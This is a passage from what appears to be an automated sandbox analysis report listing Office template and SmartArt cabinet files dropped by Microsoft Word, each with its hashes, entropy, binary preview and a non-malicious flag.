                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):43653
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.899157106666598
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                                                                                                                                                                                                                                                                                                                                                          MD5:DA3380458170E60CBEA72602FDD0D955
                                                                                                                                                                                                                                                                                                                                                                          SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....uk......L...........................uk...?...................j......r...............Equations.dotx.................Content.inf.94v..R..[..... .............v........." Vw.w..r.....D.V5.p...W......b;....\x.....f.-...............l.....L.F..*..@..BnF.I.....%1..0....&.X.......X-.\.\.>..A....@..:...N .G./.Sp.A0.0.`.....q....b... ......S.{K...V....J............>\....\.E.#.,$.hxu.F.Fo....<...{..6../..#..l>d...w...&...S.....L.].....^..L......;~l.......qw.o. .....v.u.W`.4Z.A.....dC..Q)9.c..qgtfJ..G.(.J....q4V.).mK4;..zY..b.5&....V...0X.].Z..U.Lx..^..:8XQh.....7yy.._5............c.W...c...xY..%..G.$....kg^.1g.9.....z^.'...q."..K)a[.pW .LS.:Q8.....2..._q.os....y...d11.*.m....8.,.^.4_?i.e.u.,....._y.....zZZA.D.D<..+....{....Sfnv...t.....0...vV..y.r..3..%.<.t......;.h.wh.-.g.>..5...R...........y..]^..R..<...>$~.'...kk.n..H.EN.eQ.Q.O./='....)t.l0,/].....FNN......?...&..'.eS....K.K.v".^L..x=.^......1x|....=}@...B.kq;_a..C.q?..Y9.v......Q..u.G..V.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):46413
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9071408623961394
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                                                                                                                                                                                                                                                                                                                                                          MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):25314
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.729848360340861
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                                                                                                                                                                                                                                                                                                                                                          MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):23597
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.692965575678876
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                                                                                                                                                                                                                                                                                                                                                          MD5:7C645EC505982FE529D0E5035B378FFC
                                                                                                                                                                                                                                                                                                                                                                          SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):22149
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.659898883631361
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                                                                                                                                                                                                                                                                                                                                                          MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                                                                                                                                                                                                                                                                                                                                                          SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):21791
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.65837691872985
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                                                                                                                                                                                                                                                                                                                                                          MD5:7BF88B3CA20EB71ED453A3361908E010
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F75F86557051160507397F653D7768836E3B5655
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):22594
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.674816892242868
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                                                                                                                                                                                                                                                                                                                                                          MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):20554
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.612044504501488
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                                                                                                                                                                                                                                                                                                                                                          MD5:486CBCB223B873132FFAF4B8AD0AD044
                                                                                                                                                                                                                                                                                                                                                                          SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):21111
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.6297992466897675
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                                                                                                                                                                                                                                                                                                                                                          MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):19893
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.592090622603185
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                                                                                                                                                                                                                                                                                                                                                          MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):21357
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.641082043198371
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                                                                                                                                                                                                                                                                                                                                                          MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                                                                                                                                                                                                                                                                                                                                                          SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
